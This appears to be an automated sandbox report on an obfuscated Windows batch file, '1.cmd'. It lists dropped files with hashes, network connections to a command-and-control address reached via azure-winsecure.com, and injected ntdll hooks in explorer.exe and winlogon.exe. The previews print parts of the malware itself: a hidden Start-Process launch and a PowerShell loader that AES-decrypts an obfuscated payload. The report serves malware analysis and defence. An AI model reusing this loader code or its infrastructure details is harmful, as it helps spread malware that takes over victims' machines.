Preview:	ElfFile.........................................................................................................................ElfChnk.....................................p ..."..x.......................................................................N{..................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................^...3...............................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	4.362194486499595
Encrypted:	false
SSDEEP:	384:1cRqxhSRumRtRqR5RVR+rRvR3RFRXRmRbR+RLRlRFRDRiwhR3KR31RIRB8R+PRdO:1pxA8nPLGbMb
MD5:	6AA5FD4D824EFD4448C04B35C094FF56
SHA1:	B4EF0825ADCF4192C9F9E9E223077517D77E4BE5
SHA-256:	E1440DDE27BCA23A2D29924AF202F43F54172C55AEF549E71F41DC08B532EDC8
SHA-512:	E1378BB8FF3F6FBC56648CAD6168F59CB62AB01F42A6992F34D14C6B46D2498176E17F01C4DD63D15273491D38AF1A16791F014BB469F4292ABE8C9D1823C630
Malicious:	false
Preview:	ElfChnk............................................./I......................................................................+s.......................y.......x..N...........=............................................y..................}y..3...........................................c......xb..f...h.......lc..?.......................h........c......M.......M...F...9c..............................................Qb..............................................A.......i.......................&............x..**...............S..1..........x68................................................................<.......T.....!................@.S..1...KK..A..K..U.8.w.....\........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y.......#F.~.J.{..M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.M.I.-.A.c.t.i.v.i.t.y./.O.p.e.r.a.t.i.o.n.a.l......Qb......................N...W.M.I.P.r.o.v.......w.m.i.p.r.v.s.e...e.x.e.......%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.b.e.m.\.w.m.i.p

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.273338343434408
Encrypted:	false
SSDEEP:	384:mhWhjhUh4h4hthXhzh8cghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhahYhC1:mBsFpkBjOFK
MD5:	C37372EB51AEDB4552CB839C7294403A
SHA1:	7B7C408D72B084CE36AA6B623AC6B907FD21D569
SHA-256:	C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
SHA-512:	69183719C29FCE5CEDB2634579ABA9FEF835A3CDC7668BB741F9DB36050756C088FD331E898DA8E4850887FD217B939DF1C5A3E7D73D2260CB3AC3570E71718E
Malicious:	false
Preview:	ElfChnk....................................................................................................................x...........................................8...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..............i.T..............&............"3WI..L..........A..\|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.231195890775603
Encrypted:	false
SSDEEP:	384:ZhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVt9VjViVyVKVui:Zyjbn
MD5:	3365A34953FD7B16667108A049B64DA5
SHA1:	C72421A58E063D64072152344B266F8306A78702
SHA-256:	AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
SHA-512:	A5569EDC7516DACCCE7B3135114588E01ED1A77CA95B0F378E389E27AC8999EA71E8AF36FD275EEA7E81987CB9BF14910645DE3DC4FE8E086FF532796DD78AAF
Malicious:	false
Preview:	ElfChnk.........!...............!............7..`8...j......................................................................@..#................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v....................................................3..................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.350996099530715
Encrypted:	false
SSDEEP:	384:dh+BwB5BwBjBwBNSBwBYiBwB+BwBXBwBZabSqBwBlQBwBtfBwBvBwBPnBwBIrBwG:dOqabeGTnbuSxg6On
MD5:	4A38F556B28847C79565F8F5B2E18529
SHA1:	581498A0BC8A3EC2988AFE5C7FC0F60E14DF289A
SHA-256:	E86ADB1001A17550D1F82D4B4136E5BD225EFC1D5456A36CE24E78834324A687
SHA-512:	CE66231966337110F34D59C0E361E8859EE0B350AFFA40FAFAA47D58E105CD4D54F8ED8FA1B9A8F61E0C8F01CAA4CB364CDF58A9FC7BADDBF203EEE003F9F54F
Malicious:	false
Preview:	ElfChnk.....................................H...x....y......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F....................S......................................&...................................u...................................................**...............Dbf..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.421206160086997
Encrypted:	false
SSDEEP:	384:ah1qUEzUELUEnUEQUEpUE9UE4UEvUEqUEGUEuUEyUEpjUEmUE6UEVUE1UEdUEoUF:arN5mPfkvmR
MD5:	67CAD90771EBC0BD20736201D89C1586
SHA1:	EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7
SHA-256:	7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
SHA-512:	27DE77A98E11A1D33B648B9F46671F61338B1746032B4AD8F003A8A5C52FB7C3ECCB834057074EF5FCD3459A0810439BAF63E1320B385F7A5E81757A90BBFD13
Malicious:	false
Preview:	ElfChnk.........l...............l...............@....^.....................................................................+t].................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......Q8.......................................................6......................**...............yM..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69752
Entropy (8bit):	4.432394242976953
Encrypted:	false
SSDEEP:	384:qqmooWsoIKo+xooWrooWlooWrooW2qsFRzBO2M7t5ZoqRMteoO1nRBocgTo+ryyM:iH+DemRngbe9R
MD5:	EE8158B63D705FFF801B791B44016C44
SHA1:	14CBFBAB6E6AA4DE6C3F4E286DBC7934D96742C3
SHA-256:	87DE0FBF45D47322673770905464FB86C7D1858AB65BA73A33A12202AAC66BCE
SHA-512:	0A13AE408DFCC92991F779E403B299BB3DC13E3728A78642768E21951EC5560E3DB4153500A11D32288963E4B227CB9BBC74297878FE857DB82B09F81AE8CBB1
Malicious:	false
Preview:	ElfChnk.........-.......U...........................N.k$.....................................................................2..................Z...s...h...................=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:....................$......C+..3...........................&...............................................>.......................s5..........**......{........@..1.............>...............................................................F.............!....6.......... ..@..1.........O........t.......{........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B........................N...........................................$.N......j.o.n.e.s...J.O.N.E.S.-.P.C...}@......M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.a.b.h.q.h.y.z.r.h.m.n.q.b.t...........%.%.8

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.418013163886424
Encrypted:	false
SSDEEP:	384:ZFR0Gu1Bb9w+1a7I+OkYDcND+S/qDhqqOc0qgfARMR2RvHeJvGAgXZIpURCOLiju:zC/JVMjynLmLQXHmtpJnqiNHpzoQp
MD5:	9BDC273BED40B8666562C1CF55CF35AB
SHA1:	C99C338E2B9DA3FEBE248763E66C4563B6155537
SHA-256:	FC974E37E278EC66C1E07D4011E7CE0A54E7EFFADF9D6D565404F0161AD1913C
SHA-512:	A44CA3655ABDE272ACB6261E7850256719366DDB509A0ADF5EFD0289B9A7642361FAEE0D6F903E1B477AA37C58D82B3DED121EEEC05BDA13E8CE69D246CA80B8
Malicious:	false
Preview:	ElfChnk.................m.......t...............`...P...........................................................................................,...s...h...............T...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m........g..0..........i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	320504
Entropy (8bit):	3.9318038850693373
Encrypted:	false
SSDEEP:	6144:UgfRHVgfRLgfR8VgfRBgfROgfRHVgfRLgfR8VgfRBgfR27aze3znaze2gfRHVgf1:
MD5:	989FE11B6850F4E607A4BB44FE61EE3F
SHA1:	3BE41878FD7BAACDE6262191CEFAB3482CF1C1CA
SHA-256:	F4C05CF2479E1CEA9D7317E6ACFB8B91F6A3866CBBEC691090E100A1B3943172
SHA-512:	08C945B764CA8D833ACEB8E648864A611B52B629BA9BD55E9801D61FFCB7A29732FCEFFADD1CB206D41B062C6FF9C6D654D9753DA976C767D32A20B064D5B796
Malicious:	false
Preview:	ElfChnk.....................................p.........?.....................................................................Z. ............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**................H"1..........B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_lvxm11ep.434.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4664723531859085
Encrypted:	false
SSDEEP:	6144:sIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uN8dwBCswSb+:RXD94zWlLZMM6YFH6++
MD5:	6C2338766D8478DF3B9442DF7361058B
SHA1:	542BE768E8C7ADF462F6F6E80DA7E53FE7337AAE
SHA-256:	730FA60EF15D586994FCE66B5D90A2B29E0F6117E8E2E78A9C56DA74FC212A6D
SHA-512:	67840BB92130BDFC1733591A3596B45D599958638EE0C1F49E0B673FBA1781B0D72258483F429C5E2C51AC7300C55B4708095581A0FB79C6C93BEBE9A54AA64A
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..0...............................................................................................................................................................................................................................................................................................................................................t-..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.84935141926561
Encrypted:	false
SSDEEP:	3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
MD5:	D8C4F9FD5B972AE487170EA993933179
SHA1:	32E61F1DD8A462CEDC6B7A636275363B011ABDA9
SHA-256:	728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
SHA-512:	1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
Malicious:	false
Preview:	Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2692), with CRLF line terminators
Category:	dropped
Size (bytes):	2839
Entropy (8bit):	5.269550461652421
Encrypted:	false
SSDEEP:	48:9JFHDRBXRG8R4YRxyKB3k4B3KX9zS3FXBvY595f8bLb8MS91ccCwMqu1whc9pWiM:PFHDRtVt7vBpB6a5xY595f8bus3wMVd2
MD5:	39401ABDD4A08EE5458DF7CB80F69CED
SHA1:	A4F498F6E926AC3A23F561C1C582C51217FA9093
SHA-256:	06CC781B4C21259ED5B86C26A54BFCFD61D5049BF62338571F77E801227FFAC1
SHA-512:	7BC97E8DF1C92730F6462151B688F1A5952F220199BD52F963A6CEA4DC04EEF6C842D776D26DF845688C369935DD71FFFE269AA75DC10B017F5926D21448C9BD
Malicious:	false
Preview:	Windows PowerShell..Copyright (C) Microsoft Corporation. All rights reserved.....Try the new cross-platform PowerShell https://aka.ms/pscore6....PS C:\Users\user\Desktop> function Rgueq($eXEDy){.$HKJEc=[System.Security.Cryptography.Aes]::Create();.$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ=');.$HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA==');.$HipTi=$HKJEc.CreateDecryptor();.$ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length);.$HipTi.Dispose();.$HKJEc.Dispose();.$ioqgE;}function qVeuI($eXEDy){.Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', '');.Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblc

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (5674), with CRLF line terminators
Entropy (8bit):	6.008710946572079
TrID:	BibTeX references (5501/1) 100.00%
File name:	1.cmd
File size:	5'214'429 bytes
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
SHA512:	94dde8d5d0100e892ca004556b30b8e8fedacc1e3482dab9d611bd64569b2f73e29da93db2c7ae51585791a4f39d01426ee6663c48602de92aa74f6ebe3f630a
SSDEEP:	49152:9YFeyNRX+o9UIcbBIXu/DloMIZv/us2aFGKeXGuqzwIEqHL5l8M/CJs2:f
TLSH:	8536120B1D54ECBECDA50DAEE95A2F0FF432BE57F02909B6611B05BD07781E104D9A3A
File Content Preview:	@echo off..%^%@%KhlQYXcflBNlDRnjWyCtzUMbVdihsfHGoAGNTEJeLZNLqMbLlXPalwqPvjUVOUMfTgWclzprOxHzgaKicxWvpHuSkQsKJOpQnISjQYALHylNOQJuzMSrYqQlLdSuhFIahRmyiAsdWkORvHethXkXVYRWSGyNffDcPlGXEkmYtPvNCYPeZznkuLejZqGBcFYQHLck%%^%e%hPWLmDgCetTQtOGStIdgwXoEKVOREgRWEdRJq

File Icon


Icon Hash:	9686878b929a9886

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 09:43:11.225049973 CEST	49835	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:11.229967117 CEST	6969	49835	192.64.119.55	192.168.2.4
Oct 4, 2024 09:43:11.230060101 CEST	49835	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:11.238358021 CEST	49835	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:11.243372917 CEST	6969	49835	192.64.119.55	192.168.2.4
Oct 4, 2024 09:43:32.616575003 CEST	6969	49835	192.64.119.55	192.168.2.4
Oct 4, 2024 09:43:32.616772890 CEST	49835	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:32.623522043 CEST	49835	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:32.628834009 CEST	6969	49835	192.64.119.55	192.168.2.4
Oct 4, 2024 09:43:36.349204063 CEST	49993	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:36.358129025 CEST	6969	49993	192.64.119.55	192.168.2.4
Oct 4, 2024 09:43:36.359184027 CEST	49993	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:36.361568928 CEST	49993	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:36.374773979 CEST	6969	49993	192.64.119.55	192.168.2.4
Oct 4, 2024 09:43:57.712136030 CEST	6969	49993	192.64.119.55	192.168.2.4
Oct 4, 2024 09:43:57.712508917 CEST	49993	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:57.712898016 CEST	49993	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:43:57.717854977 CEST	6969	49993	192.64.119.55	192.168.2.4
Oct 4, 2024 09:44:01.113701105 CEST	50016	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:44:01.119086981 CEST	6969	50016	192.64.119.55	192.168.2.4
Oct 4, 2024 09:44:01.119292974 CEST	50016	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:44:01.119541883 CEST	50016	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:44:01.124370098 CEST	6969	50016	192.64.119.55	192.168.2.4
Oct 4, 2024 09:44:22.509109020 CEST	6969	50016	192.64.119.55	192.168.2.4
Oct 4, 2024 09:44:22.509397030 CEST	50016	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:44:33.882853031 CEST	50016	6969	192.168.2.4	192.64.119.55
Oct 4, 2024 09:44:33.888209105 CEST	6969	50016	192.64.119.55	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 09:43:11.203910112 CEST	62732	53	192.168.2.4	1.1.1.1
Oct 4, 2024 09:43:11.218769073 CEST	53	62732	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 09:43:11.203910112 CEST	192.168.2.4	1.1.1.1	0x3e9a	Standard query (0)	azure-winsecure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 09:43:11.218769073 CEST	1.1.1.1	192.168.2.4	0x3e9a	No error (0)	azure-winsecure.com		192.64.119.55	A (IP address)	IN (0x0001)	false

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	03:41:59
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Imagebase:	0x7ff7183f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
